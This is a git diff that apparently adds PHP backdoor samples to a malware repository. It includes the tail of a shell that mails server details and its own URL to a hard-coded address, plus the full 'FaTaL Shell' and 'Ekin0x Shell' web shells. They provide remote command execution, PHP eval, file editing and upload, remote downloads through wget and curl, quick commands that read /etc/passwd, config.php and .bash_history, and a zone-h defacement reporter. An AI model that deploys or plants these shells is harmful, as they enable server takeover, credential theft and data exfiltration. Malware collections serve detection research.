+ elseif ($colorn == 1) { + $colorn = 0; + } + } + } + closedir($handle); +} + $OS = @PHP_OS; + $UNAME = @php_uname(); + $PHPv = @phpversion(); + $SafeMode = @ini_get('safe_mode'); + + if ($SafeMode == '') { $SafeMode = "OFF
"; } + else { $SafeMode = "$SafeMode
"; } + + + $injek=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); + $psn=("OS = " . $OS . "
UNAME = " . $UNAME . "
PHPVersion = " . $PHPv . "
Safe +Mode = " . $SafeMode . "
http://" . $injek . "
Ingat jangan +Guna Target Ini.
By: MSN PEBA"); + + $header = "From: $_SERVER[SERVER_ADMIN] <$from>\r\nReply-To: $replyto\r\n"; + $header .= "MIME-Version: 1.0\r\n"; + If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; + If ($file_name) $header .= "--$uid\r\n"; + $header .= "Content-Type: text/$contenttype\r\n"; + $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; + $header .= "$message\r\n"; + If ($file_name) $header .= "--$uid\r\n"; + If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; + If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; + If ($file_name) $header .= "Content-Disposition: attachment; +filename=\"$file_name\"\r\n\r\n"; + If ($file_name) $header .= "$content\r\n"; + If ($file_name) $header .= "--$uid--"; + $to = ("arms27@fdfrr.com"); + $subject = ("Hajar bos"); + mail($to,$subject,$psn,$header); +@include "$bn"; +?> +
Permision Nama File Kapasiti Perintah
$perms $file $file $file $file $file + $file $file $file $size KB Rename | Del +| Chmod | Copy Rename | Del +| Chmod | Copy
+
+ + + diff --git a/PHP/Backdoor.PHP.Agent.bn b/PHP/Backdoor.PHP.Agent.bn new file mode 100644 index 00000000..34f4b3cf --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bn @@ -0,0 +1,283 @@ +$v){$_POST[$k] = stripslashes($v);}} +@ini_set('max_execution_time',0); +(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF(Rootla_Beni:)"); + +(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0); +(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0); +$version='version 1.0 by FaTaLErrOr'; +$action=$_POST['action']; +$file=$_POST['file']; +$dir=$_POST['dir']; +$content=''; +$stdata=''; +$style=''; +$header=''.getenv("HTTP_HOST").' - FaTaL Shell v1.0'.$style.''; +$footer=''; + +$lang=array( +'filext'=>'Lutfen Dosyayi Adlandiriniz Yada Degistiriniz.', +'uploadok'=>'Baþarýyla Yüklendi.', +'dircrt'=>'Klasör Oluþturuldu.', +'dontlist'=>'Listelenemiyor Ýzin Yok.', +'dircrterr'=>'Oluþturulamýyor Ýzin Yok.', +'dirnf'=>'Dizin Bulunamadi.', +'filenf'=>'.', +'dontwrdir'=>'Sadece Okunabilir.', +'empty'=>'Dizin Boþ Deðil Yada Ýzin Yok.', +'deletefileok'=>'Dosya Silindi.', +'deletedirok'=>'Klasör Silindi.', +'isdontfile'=>'Lütfen Full Url Yazýn. c:/program files/a.php Gibi', +'cantrfile'=>'Dosya Açýlamýyor izin Yok.', +'onlyracc'=>'Dosya Editlenemiyor Okuma Ýzni Var Sadece..', +'workdir'=>'Çalýþma Dizini: ', +'fullacc'=>'Full Yetki.', +'fullaccdir'=>'Full Yetkiniz Var Dosya Silip Düzenleyebilirsiniz.', +'thisnodir'=>'Klasör Seçin.', +'allfuncsh'=>'Fonksiyoýnlar Kapalý.' +); + +$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir');//here added new actions + +function test_file($file){ +if(!file_exists($file))$err="1"; +elseif(!is_file($file)) $err="2"; +elseif(!is_readable($file))$err="3"; +elseif(!is_writable($file))$err="4"; else $err="5"; +return $err;} + +function test_dir($dir){ +if(!file_exists($dir))$err="1"; +elseif(!is_dir($dir)) $err="2"; +elseif(!is_readable($dir))$err="3"; +elseif(!is_writable($dir))$err="4"; else $err="5"; +return $err;} + +function perms($file){ + $perms = fileperms($file); + if (($perms & 0xC000) == 0xC000) {$info = 's';} + elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} + elseif (($perms & 0x8000) == 0x8000) {$info = '-';} + elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} + elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} + elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} + elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} + else {$info = 'u';} + $info .= (($perms & 0x0100) ? 'r' : '-'); + $info .= (($perms & 0x0080) ? 'w' : '-'); + $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-')); + $info .= (($perms & 0x0020) ? 'r' : '-'); + $info .= (($perms & 0x0010) ? 'w' : '-'); + $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-')); + $info .= (($perms & 0x0004) ? 'r' : '-'); + $info .= (($perms & 0x0002) ? 'w' : '-'); + $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-')); + return $info;} + +function view_size($size){ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size;} + +if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer"; + +if(isset($dir)){ + $ts['test']=test_dir($dir); + switch($ts['test']){ + case 1:$stdata.=$lang['dirnf'];break; + case 2:$stdata.=$lang['thisnodir'];break; + case 3:$stdata.=$lang['dontlist'];break; + case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break; + case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;} +}else $dir=@chdir($dir); + +$dir=getcwd()."/"; +$dir=str_replace("\\","/",$dir); + +if(isset($file)){ + $ts['test1']=test_file($file); + switch ($ts['test1']){ + case 1:$stdata.=$lang['filenf'];break; + case 2:$stdata.=$lang['isdontfile'];break; + case 3:$stdata.=$lang['cantrfile'];break; + case 4:$stdata.=$lang['onlyracc'];$file=$file;break; + case 5:$stdata.=$lang['fullacc'];$file=$file;break;} +} + +function shell($cmd) +{ + global $lang; + $ret = ''; + if (!empty($cmd)) + { + if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);} + elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);} + elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();} + elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();} + elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);} + else $ret=$lang['allfuncsh']; + } + return $ret; +} + +function createdir($dir){mkdir($dir);} + +//delete file +if($action=="delete"){ +if(unlink($file)) $content.=$lang['deletefileok']." AnaSayfaya Dönemk Ýçin Týklayýnýz."; +} +//delete dir +if($action=="deletedir"){ +if(!rmdir($file)) $content.=$lang['empty']." AnaSayfaya Dönemk Ýçin Týklayýnýz."; +else $content.=$lang['deletedirok']." AnaSayfaya Dönemk Ýçin Týklayýnýz."; +} +//shell +if($action=="shell"){ +$content.="
+ +
+
+
";} +//editor +if($action=="editor"){ + $stdata.="
+ + + Dosyanýn Adý (Full Url Yazýn)
"; + function writef($file,$data){ + $fp = fopen($file,"w+"); + fwrite($fp,$data); + fclose($fp); +} + function readf($file){ + clearstatcache(); + $f=fopen($file, "r"); + $contents = fread($f,filesize($file)); + fclose($f); + return htmlspecialchars($contents); +} +if(@$_POST['save'])writef($file,$_POST['data']); +if(@$_POST['create'])writef($file,""); +$test=test_file($file); +if($test==1){ +$content.="
+ +File name:
+ +
"; +} +if($test>2){ +$content.="
+ + +
+
"; +}} +//viewer +if($action=="viewer"){ +$content.=""; +$content.=""; + if (is_dir($dir)) { + if (@$dh = opendir($dir)) { + while (($file = readdir($dh)) !== false) { + if(filetype($dir . $file)=="dir") $dire[]=$file; + if(filetype($dir . $file)=="file")$files[]=$file; + } + closedir($dh); + @sort($dire); + @sort($files); + if ($GLOBALS['os']==1) { + $content.=""; + } + $content.=""; + for($i=0;$i'.$dire[$i].''; + } + for($i=0;$i'.$files[$i].'
'; + } + $content.="
Klasore Git:
HDD Secin:"; + for ($j=ord('C'); $j<=ord('Z'); $j++) + if (@$dh = opendir(chr($j).":/")) + $content.=' '.chr($j).''; + $content.="
Sistem: ".@php_uname()."
BiçimBoyutizinSeçenekler
Klasor'.perms($link).'X
Dosya'.view_size(filesize($linkfile)).''.perms($linkfile).'DEX
"; +}}} +//downloader +if($action=="download"){ +header('Content-Length:'.filesize($file).''); +header('Content-Type: application/octet-stream'); +header('Content-Disposition: attachment; filename="'.$file.'"'); +readfile($file);} +//phpeval +if($action=="phpeval"){ +$content.="
+ + + <?php
+
+ ?>
+
"; +if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);} +//upload +if($action=="upload"){ + if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir; + $form_win="
+ + Buraya Uploadla:Dosyayý Adlandýr (Gerekli) :"; + if($os==1)$content.=$form_win; + if($os==0){ + $content.=$form_win; + $content.='File addres: +
'; +} + +if(isset($_POST['uploadloc'])){ +if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else +$uploadfile = $dirupload."/".$_POST['filename']; + +if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);} +if(file_exists($uploadfile))$content.=$lang['filext']; +elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) +$content.=$lang['uploadok']; +} + +if(isset($_POST['upload'])){ + if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename'])) + switch($_POST['with']) + { + case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break; + case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break; + case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break; + case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break; + case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break; + case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break; +}}} +//end function +?> + + +

FaTaLSheLL v1.0

+
| Shell | Ana Sayfa| Dosya Editle| Dosya Upload| Php Eval | <-Geri | Ýleri->|

+

 

+ +
Safe mode:
+ Fonksiyon Kýsýtlamasý:
+ Sistem:
+ Durum:
COPYRIGHT BY StarHack.oRg
\ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.bo b/PHP/Backdoor.PHP.Agent.bo new file mode 100644 index 00000000..04c66855 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bo @@ -0,0 +1,613 @@ + + +";print"
$delmtxt
";} +function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd); +$nscmd=htmlspecialchars($scmd);print $nscmd;} +elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd); +$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;} +elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r"); +while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));; +print $res;}pclose($pcmd);}elseif(!function_exists(popen)){ +ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){ +ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean(); +print htmlspecialchars($pret);}} +function input($type,$name,$value,$size) +{if (empty($value)){print "";} +elseif(empty($name)&&empty($size)){print "";} +elseif(empty($size)){print "";} +else {print "";}} +function permcol($path){if (is_writable($path)){print ""; +callperms($path); print "";} +elseif (!is_readable($path)&&!is_writable($path)){print ""; +callperms($path); print "";} +else {print "";callperms($path);}} +if ($dlink=="dwld"){download($_REQUEST['dwld']);} +function download($dwfile) {$size = filesize($dwfile); +@header("Content-Type: application/force-download;name=$dwfile"); +@header("Content-Transfer-Encoding: binary"); +@header("Content-Length: $size"); +@header("Content-Disposition: attachment; filename=$dwfile"); +@header("Expires: 0"); +@header("Cache-Control: no-cache, must-revalidate"); +@header("Pragma: no-cache"); +@readfile($dwfile); exit;} +?> + + +Ekin0x Shell + + + + +";$ef=""; +$st=""; +$et="
";$c1=""; +$c2="";$ec=""; +$sta=""; +$sfnt="";$efnt=""; +################# Ending of common variables ######################## + +print"";print"";print"
"; print"
## Ekin0x Shell ## +
"; print"
";print "
"; +print"";print"";print"
"; print"
";print "Home"; +print " - Geri"; +print " - phpinfo"; +if ($dlink=='phpinfo'){print phpinfo();die();} +print " - Base64 decode"; +print " - Url decode"; +print " - Url encode"; +print " - Md5"; +print " - Izinleri Kontrol Et"; +print " - File source"; +print " - Quick index"; +print " - Zone-h"; +print " - Mail"; +print " - Cmd help"; +if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase'])); +print "

Result is : $sfnt".$cbase."$efnt"; die();} +if ($dlink=="basepw"){ print "

[ Base64 - Decoder ]"; +print $sf;input ("text","ncbase",$ncbase,35);print " "; +input ("submit","","Decode","");print $ef; die();} +if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld'])); +print "

Result is : $sfnt".$urldc."$efnt"; die();}if ($dlink=='urld'){ +print "

[ Url - Decoder ]"; print $sf; +input ("text","nurld",$nurld,35);print " "; +input ("submit","","Decode","");print $ef; die();} +if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen']))); print "

Result is : $sfnt".$urlenc."$efnt"; die();} +if ($dlink=='urlen'){print "

[ Url - Encoder ]"; +print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();} +if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf'])); +print "

Result is : $sfnt".$mdfe."$efnt"; die();}if ($dlink=='mdf'){ +print "

[ MD5 - Encoder ]"; +print $sf;input ("text","nmdf",$nmdf,35);print " "; +input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef; +print "

";print "
";print "
";die();} +function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){ +print "

[ Sorry, U choosed an empty file or the file not exists ]";die();} +elseif(isset($showsc)&&filesize($showsc) !=="0") { +print "

"; +if (!show_source($showsc)||!function_exists('show_source')){print "
[ Sorry can't complete the operation ]
";die();}print "
";die();}}if ($dlink=='showsrc'){ +print "

: Choose a php file to view in a color mode, any extension else will appears as usual :";print "

"; +input ("text","showsc","",35);print " "; +input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Show-src","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));} +if ($dlink=='cmdhlp'){ +print "

: Insert the command below to get help or to know more about it's uses :";print ""; +input ("text","hlp","",35);print " "; +input ("submit","","Help","");print $ef; die();} +if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp']; +print "

[ The command is $sfnt".$hlp."$efnt ]"; +$hlp = escapeshellcmd($hlp);print "

"; +if (!function_exists(shell_exec)&&!function_exists(exec)&& +!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) +{print "
[ Sorry can't complete the operation ]
";}else {print "
";
+if(!callfuncs("man $hlp | col -b")){print "
[ Finished !! ]";}print "
";}print "
";die();} +if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt'])) +{if (touch ($_REQUEST['indx'])==true){ +$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt'])); +fclose($fp);print "

[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]

";print "
[ Yeniden Editle +] -- [ Curr-Dir ]
";die(); }else {print "

[ Sorry, Can't create the index !! ]

";die();}} +if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){ +print $sf."
";print "

"; +input ("text","indx","Index-name",35);print " "; +input ("submit","qindsub","Create","");print $ef;die();} +if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){ +$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt']; +if (mail($mailto,$subj,$mailtxt)){print "

[ Mail sended to $sfnt".$mailto." $efnt successfully ]

"; die();}else {print "

[ Error, Can't send the mail ]

";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "

[ Error, Can't send the mail ]

";die();} +if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){ +print $sf."
";print "

";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " "; +input ("submit","mailsub","Send-mail","");print $ef;die();} +if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);} +function callzone($nscdir){ +if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";} +else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";} +fwrite ($fpz,"\$arq = @ARGV[0]; +\$grupo = @ARGV[1]; +chomp \$grupo; +open(a,\"<\$arq\"); +@site = ; +close(a); +\$b = scalar(@site); +for(\$a=0;\$a<=\$b;\$a++) +{chomp \$site[\$a]; +if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; } +print \"[+] Sending \$site[\$a]\n\"; +use IO::Socket::INET; +\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next; +print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\"; +print \$sock \"Accept: */*\r\n\"; +print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\"; +print \$sock \"Accept-Language: pt-br\r\n\"; +print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\"; +print \$sock \"Connection: Keep-Alive\r\n\"; +print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\"; +print \$sock \"Host: old.zone-h.org\r\n\"; +print \$sock \"Content-Length: 385\r\n\"; +print \$sock \"Pragma: no-cache\r\n\"; +print \$sock \"\r\n\"; +print \$sock \"notify_defacer=\$grupo¬ify_domain=http%3A%2F%2F\$site[\$a]¬ify_hackmode=22¬ify_reason=5¬ify=+OK+\r\n\"; +close(\$sock);}"); +if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']); +}else{print "

[ Can't complete the operation, try change the current dir with writable one ]
";}$zonet=$_REQUEST['zonet']; +if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) +{print "[ Can't complete the operation !! ]";} +else {callfuncs("chmod 777 $zpl;chmod 777 $li"); +ob_start();callfuncs("perl $zpl $li $zonet");ob_clean(); +print "

[ All sites should be sended to zone-h.org successfully !! ]";die();} +}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){ +print $sf."
";print "

";input ("text","zonet","Hacker-name",35);print " "; +input ("submit","zonesub","Send","");print $ef;die();} +print "
"; print"
";print "
"; +function inisaf($iniv) { $chkini=ini_get($iniv); +if(($chkini || strtolower($chkini)) !=='on'){print"Kapali ( Guvenlik Yok )";} else{ +print"Acik ( Guvenli )";}}function inifunc($inif){$chkin=ini_get($inif); +if ($chkin==""){print " None";} +else {$nchkin=wordwrap($chkin,40,"\n", 1);print "".$nchkin."";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);} +elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r'); +while (!feof($opop)){ $nval= fgetc($opop);}} +elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){ +ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();} +if($nval=$owhich){print"ON";} +else{print"OFF";} } +print""; +print"
"; print"

"; +print"Safe-mode :\t";print inisaf('safe_mode');print "";print"
"; +if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print ""; print""; print""; print""; print""; print""; print""; print "
"; +print "
"; print"
Mysql : "; +callocmd('which mysql','/usr/bin/mysql'); +print"
"; print"
Perl : "; +callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"		"; print"
Gcc : "; +callocmd('which gcc','/usr/bin/gcc'); print"		"; +print"
Curl : "; callocmd('which curl','/usr/bin/curl'); print"		"; print"
GET : "; +callocmd('which GET','/usr/bin/GET'); +print"		";print"
Wget : "; +callocmd('which wget','/usr/bin/wget'); +print"		"; print"
Lynx : "; +callocmd('which lynx','/usr/bin/lynx'); +print"
"; }print "

"; +print "IP Numaran : ".$REMOTE_ADDR."
"; +print "Server IP : ".$SERVER_ADDR.""; +print"
".$SERVER_SIGNATURE.""; +print "Server ADI : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."
"; +print "Engelli Fonksiyonlar : ";inifunc(disable_functions);print"
"; +print "Kimsin : "; callfuncs('id');print"
Os : "; +if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else { +if (!function_exists(shell_exec)&&!function_exists(exec)&& +!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) +{print php_uname(); print "/";print PHP_OS;} +else {callfuncs('uname -a');}}print"
"; +print"Php-versiyon : ".phpversion(); print"
Current-path : "; +print $nscdir."     [ ";permcol($nscdir);print " ]"; +print"
";print "Shell'in Burda : " .__file__; +print"
Toplam Alan: "; readable_size(disk_total_space($nscdir));print " / "; +print"Bos Alan: "; readable_size(disk_free_space($nscdir)); +print "
"; print"

"; +if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']); +if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; } +else{$mess="Klasör Olustur/Sil";}}elseif (isset($_REQUEST['deldir'])) +{ $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}} +else{$mess="Klasör Olustur/Sil";}if(isset($_REQUEST['crefile'])){ +$ncfile=trim($_REQUEST['cfile']); +if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);} +else{ $mess3= "Dosya Olustur/Sil";}} +elseif(isset($_REQUEST['delfile'])){ +$ndfile=trim($_REQUEST['cfile']); +if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";} +else {$mess3= "Dosya Olustur/Sil";}} +else {$mess3="Dosya Olustur/Sil";} +class upload{ function upload($file,$tmp){ +$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";} +if (@copy($tmp,$nscdir."/".$file)){ +print "
: $file uploaded successfully :
"; }else{print "
: Error uploading $file :
";} } } } +$obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){ +$ustname=trim ($_REQUEST['ustname']);ob_start(); +if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);} +if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');} +if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');} +if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');} +if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);} +if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);} +if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);} +if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);} +if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();} +if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&& +!isset($_REQUEST['rfiletxt'])){ +if ($dh = dir($nscdir)){ while (true == ($filename =$dh->read())){ +$files[] = $filename; sort($files);}print "
"; +print"
"; +print ""; +print ""; +print ""; +print ""; +print ""; +print ""; +print ""; +print "";if(strstr(PHP_OS,"Linux")){ +print "";} +print ""; foreach ($files as $nfiles){ +if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");} +if (is_writable("$nscdir/$nfiles")){ +$scmess2= "
Evet";}else {$scmess2="
Hayir";}if (is_readable("$nscdir/$nfiles")){ +$scmess3= "
Evet";}else {$scmess3= "
Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "
Klasör";}else{$scmess4= "
Dosya";} +print"
"; print ""; print ""; +print""; +print ""; +print ""; print "";print ""; if(strstr(PHP_OS,"Linux")){ +print "";} +print ""; print ""; +}print "
"; +print "
Dosyalar";print "
";print "
Boyut";print "
";print "
Yazma";print "
";print "
Okuma";print "
";print "
Tür";print "
";print "
Düzenleme";print "
";print "
Adlandirma";print "
";print "
Indir";print "
";print "
Group";print "
";print "
Izinler";print "
"; +if (is_dir($nfiles)){print "[ $nfiles ]
";}else {print "$nfiles
";} +print"		"; +print "
"; +if (is_dir("$nscdir/$nfiles")){print "Klasör";} +elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";} +print "
"; +print "
$scmess2"; print "
"; +print "
$scmess3"; print "
"; +print "
$scmess4"; print"
";if(is_file("$nscdir/$nfiles")){ +print "
Düzenle";}else {print "
Düzenle
";}print"
";print "
Adlandir";print"
"; +if(is_file("$nscdir/$nfiles")){ +print "
indir";}else {print "
indir
";}print"
"; +print "
";owgr($nfiles); +print "
";print"		";print "
"; +permcol("$nscdir/$nfiles");print "
";print"
";print "
";}else {print "

[ Can't open the Dir, permission denied !! ]

";}} +elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){ +if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "

[ Executed command ][$] : ".$_REQUEST['cmd']."
";} +print "
".$sta;
+if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);}
+elseif(isset($_REQUEST['eval'])){
+ob_start();eval(stripslashes(trim($_REQUEST['eval'])));
+$ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);}
+elseif (isset($_REQUEST['subqcmnds'])){
+if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');}
+if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');}
+if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');}
+if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');}
+if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');}
+if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');}
+if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');}
+if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');}
+if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');}
+if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');}
+if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');}
+if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');}
+if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');}
+}print $eta."
";} +function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']); +if(is_readable($rfile)&&is_file($rfile)){ +$fp=fopen ($rfile,"r");print"
"; +print "
[ Editing ".basename($rfile)." ] [ Geri ] [ Curr-Dir ]

"; +print $sf."";if (is_writable($rfile)){ +print "
".$ef;}else +{print "
[ Can't edit ".basename($rfile)." ]

";}print "

";} +elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "
[ You selected a wrong file name or you don't have access !! ]

";}} +function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']); +if (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+"); +$rfiletxt=stripslashes($_REQUEST['rfiletxt']); +fwrite ($rffp,$rfiletxt);print "
+[ ".basename($hidrfile)." Saved !! ] +[ Curr-Dir ] [ Edit again ] +

";fclose($rffp);} +else {print "
[ Can't save the file !! ] [ Curr-Dir ] [ Back ]

